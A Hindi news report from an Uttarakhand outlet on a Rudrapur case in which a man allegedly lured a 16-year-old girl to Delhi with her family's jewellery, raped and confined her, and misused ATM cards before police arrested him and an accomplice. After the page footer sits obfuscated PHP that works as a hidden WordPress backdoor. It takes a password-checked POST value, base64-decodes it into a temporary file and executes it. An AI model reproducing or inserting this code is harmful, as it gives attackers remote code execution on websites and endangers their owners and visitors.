Uttarakhand: 21 तोला सोने के जेवरात लेकर प्रेमी संग भागी किशोरी, दिल्‍ली पहुंची तो पैरों तले खिसकी जमीन, जबरन किया दुष्‍कर्म

Uttarakhand Press 21 July 2023: Rudrapur Crime किशोरी को प्रेम जाल में फंसाकर उसे दिल्ली में ऐशो आराम से रहने का झांसा देकर युवक 21 तोला सोने और 3.211 ग्राम चांदी के जेवरात लेकर फरार हो गया। मामले में पुलिस ने मुख्य आरोपित को दिल्ली से गिरफ्तार कर किशोरी को बरामद कर लिया है। साथ ही आरोपित के दोस्त को हरिद्वार से पकड़कर जेवरात भी बरामद कर लिए हैं।

किशोरी को प्रेम जाल में फंसाकर उसे दिल्ली में ऐशो आराम से रहने का झांसा देकर युवक 21 तोला सोने और 3.211 ग्राम चांदी के जेवरात लेकर फरार हो गया। इस दौरान उसने जेवरात ठिकाने लगाने के लिए अपने दोस्त को दिए।

मामले में पुलिस ने मुख्य आरोपित को दिल्ली से गिरफ्तार कर किशोरी को बरामद कर लिया है। साथ ही आरोपित के दोस्त को हरिद्वार से पकड़कर जेवरात भी बरामद कर लिए हैं। बाद में पुलिस ने दोनों को कोर्ट में पेश कर जेल भेज दिया। एसपी सिटी मनोज कुमार कत्याल ने बताया कि जनपथ रोड पहाडी सुनार थाना ट्रांजिट कैप निवासी एक व्यक्ति ने शिकायती दर्ज कराई थी कि उसकी 16 वर्षीय बेटी दक्ष चौराहे के पास एक गिफ्ट की दुकान पर काम करती है।

18 जुलाई की सुबह आठ बजे बेटी दुकान पर जाने की बात कहकर घर से निकली थी और देर शाम तक घर नहीं लौटी। काफी खोजबीन के बाद जब घर का सामान देखा तो 21.414 ग्राम तोला सोने के जेवरात और 3.211 ग्राम तोला चांदी के जेवरात गायब थे। दो एटीएम कार्ड सहित कुछ नकदी भी गायब मिली। मामले में पुलिस ने जांच की तो पता चला कि शिव गार्डन वनखंडी नाथ कालोनी फुलसुंगा निवासी अर्पित सागर उसे प्यार का झांसा देकर भगा ले गया है।

जबरन दुष्कर्म किया:
किशोरी को बहला फुसलाकर उससे जेवरात भी मंगवाएं। जिसमें उसके दोस्त ट्रांजिट कैंप निवासी सन्नी सक्सेना की भूमिका संदिग्ध मिली। इस पर सीओ सिटी अनुषा बड़ोला, थानाध्यक्ष सुंदरम शर्मा और आवास विकास चौकी प्रभारी नीमा बोहरा, एसआइ धीरज टम्टा की अगुवाई में पुलिस टीम ने अलग-अलग बिंदुओं पर काम करते हुए कई सीसीटीवी कैमरे खंगाले। इस दौरान उनकी लोकेशन दिल्ली में मिली।

बुधवार रात को दिल्ली जाकर अर्पित को गिरफ्तार कर किशोरी को बरामद कर लिया। साथ ही अर्पित के साथी सन्नी सक्सेना को भी पुलिस ने हरिद्वार से गिरफ्तार कर लिया। पूछताछ में किशोरी ने बताया कि अर्पित ने उसको प्यार का झांसा दिया और घर से लाखों के जेवरात मंगवाकर दिल्ली ले गया। उसने अपने दोस्त सन्नी को जेवरात ठिकाने लगाने के लिए दे दिए थे और जब उसने घर जाने की जिद की तो उसके साथ जबरन दुष्कर्म किया और एक कमरे में बंधक बनाकर रखा।

एसपी सिटी मनोज कुमार कत्याल ने बताया कि बामद जेवरात की कीमत करीब 15 लाख रुपये के करीब है। दोनों आरोपितों पर मुकदमा दर्ज कर जेल भेज दिया गया है। धार्मिक अनुष्ठान में हुई मुलाकात, रच डाली साजिश एसपी सिटी मनोज कुमार कत्याल ने बताया कि किशोरी को प्रेमजाल में फंसाकर दुष्कर्म करने और लाखों रुपये के कीमत के जेवरात हड़पने का आरोपित बेहद शातिर है। आरोपित अर्पित सागर फुलसुंगा मार्ग पर बिजली का काम सीखता था और उसकी किशोरी से मुलाकात एक धार्मिक अनुष्ठान के दौरान हुई थी।

पांच मिनट की मुलाकात में ही आरोपित ने पहले उसे प्रेमजाल में फंसाया और जब किशोरी ने परिवार की आर्थिक स्थिति की जानकारी दी तो उसने छह से आठ माह की मुलाकात में घर से भागने की योजना बना ली। किशोरी को उसने बहला फुसलाया कि वह जितने ज्यादा गहने व नगदी लाएगी, वे लोग दिल्ली जाकर खुशी से रह सकेंगे।

एटीएम से कराया भुगतान:
किशोरी को बहला फुसलाकर फरार होने के दौरान मुख्य आरोपित ने सबसे पहले उसके पिता एवं बहन के एटीएम कार्ड से 70 हजार रुपये निकालकर अपने खाते में ट्रांसफार्मर करवाए। इसके बाद आरोपी ने अपने दोस्त सन्नी के सहयोग से एटीएम कार्ड का प्रयोग कर 24500 रुपये का भुगतान करवाया और 40 हजार रुपये का एक महंगा फोन खरीदा।

Read Previous

Nainital Metropole Area: क्षेत्र में धारा 144 लागू, मस्जिद तिराहे से चीना बाबा चौराहे तक रहेगा जीरो जोन

Read Next

Uttarakhand: मुस्लिम सैलून संचालक ने काटे महिला के बाल, हो गया बवाल, दुकान बंद कराने की मांग

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}